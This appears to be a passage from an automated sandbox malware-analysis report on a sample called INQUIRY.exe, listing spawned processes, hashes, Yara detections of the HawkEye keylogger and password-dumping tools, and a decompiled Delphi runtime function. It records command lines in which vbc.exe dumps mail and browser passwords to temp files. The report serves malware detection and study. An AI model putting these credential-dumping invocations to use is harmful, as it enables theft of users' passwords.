                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:02:39
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2272
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:15:02:42
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      General

                                                                      Start time:15:02:43
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      General

                                                                      Start time:15:02:45
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324
                                                                      Imagebase:0x990000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      General

                                                                      Start time:15:03:14
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:14
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:16
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:22
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2100
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:15:03:29
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:30
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:31
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      General

                                                                      Start time:15:03:34
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2284
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:15:03:38
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000024.00000002.888584585.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                      General

                                                                      Start time:15:03:38
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000025.00000002.894159498.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                      General

                                                                      Start time:15:03:40
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
                                                                      Imagebase:0x990000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET

                                                                      Disassembly

                                                                      Code Analysis

                                                                        Executed Functions

                                                                        C-Code - Quality: 65%
                                                                        			E00405CA0(intOrPtr __eax) {
                                                                        				intOrPtr _v8;
                                                                        				void* _v12;
                                                                        				char _v15;
                                                                        				char _v17;
                                                                        				char _v18;
                                                                        				char _v22;
                                                                        				int _v28;
                                                                        				char _v289;
                                                                        				long _t44;
                                                                        				long _t61;
                                                                        				long _t63;
                                                                        				CHAR* _t70;
                                                                        				CHAR* _t72;
                                                                        				struct HINSTANCE__* _t78;
                                                                        				struct HINSTANCE__* _t84;
                                                                        				char* _t94;
                                                                        				void* _t95;
                                                                        				intOrPtr _t99;
                                                                        				struct HINSTANCE__* _t107;
                                                                        				void* _t110;
                                                                        				void* _t112;
                                                                        				intOrPtr _t113;
                                                                        
                                                                        				_t110 = _t112;
                                                                        				_t113 = _t112 + 0xfffffee0;
                                                                        				_v8 = __eax;
                                                                        				GetModuleFileNameA(0,  &_v289, 0x105);
                                                                        				_v22 = 0;
                                                                        				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                        				if(_t44 == 0) {
                                                                        					L3:
                                                                        					_push(_t110);
                                                                        					_push(0x405da5);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t113;
                                                                        					_v28 = 5;
                                                                        					E00405AE8( &_v289, 0x105);
                                                                        					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405F0C, 0, 0,  &_v22,  &_v28) != 0) {
                                                                        						_v22 = 0;
                                                                        					}
                                                                        					_v18 = 0;
                                                                        					_pop(_t99);
                                                                        					 *[fs:eax] = _t99;
                                                                        					_push(E00405DAC);
                                                                        					return RegCloseKey(_v12);
                                                                        				} else {
                                                                        					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                        					if(_t61 == 0) {
                                                                        						goto L3;
                                                                        					} else {
                                                                        						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                        						if(_t63 != 0) {
                                                                        							_push(0x105);
                                                                        							_push(_v8);
                                                                        							_push( &_v289);
                                                                        							L00401338();
                                                                        							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                                                        							_t107 = 0;
                                                                        							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                                        								_t70 =  &_v289;
                                                                        								_push(_t70);
                                                                        								L00401340();
                                                                        								_t94 = _t70 +  &_v289;
                                                                        								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                                                        									_t94 = _t94 - 1;
                                                                        								}
                                                                        								_t72 =  &_v289;
                                                                        								if(_t94 != _t72) {
                                                                        									_t95 = _t94 + 1;
                                                                        									if(_v22 != 0) {
                                                                        										_push(0x105 - _t95 - _t72);
                                                                        										_push( &_v22);
                                                                        										_push(_t95);
                                                                        										L00401338();
                                                                        										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                                                        									}
                                                                        									if(_t107 == 0 && _v17 != 0) {
                                                                        										_push(0x105 - _t95 -  &_v289);
                                                                        										_push( &_v17);
                                                                        										_push(_t95);
                                                                        										L00401338();
                                                                        										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                        										_t107 = _t78;
                                                                        										if(_t107 == 0) {
                                                                        											_v15 = 0;
                                                                        											_push(0x105 - _t95 -  &_v289);
                                                                        											_push( &_v17);
                                                                        											_push(_t95);
                                                                        											L00401338();
                                                                        											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                        											_t107 = _t84;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							return _t107;
                                                                        						} else {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
